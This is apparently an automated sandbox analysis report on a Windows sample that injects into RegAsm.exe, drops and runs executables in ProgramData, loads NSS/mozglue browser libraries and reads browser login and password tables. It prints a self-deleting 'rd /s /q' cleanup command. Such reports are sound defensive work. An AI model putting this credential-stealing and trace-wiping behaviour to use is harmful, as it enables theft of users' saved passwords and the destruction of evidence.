Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: BGIJJK.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: c:\rje\tg\h2r2\obj\Re\ease\etf.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2148380649.0000000035593000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2142626224.00000000296BC000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
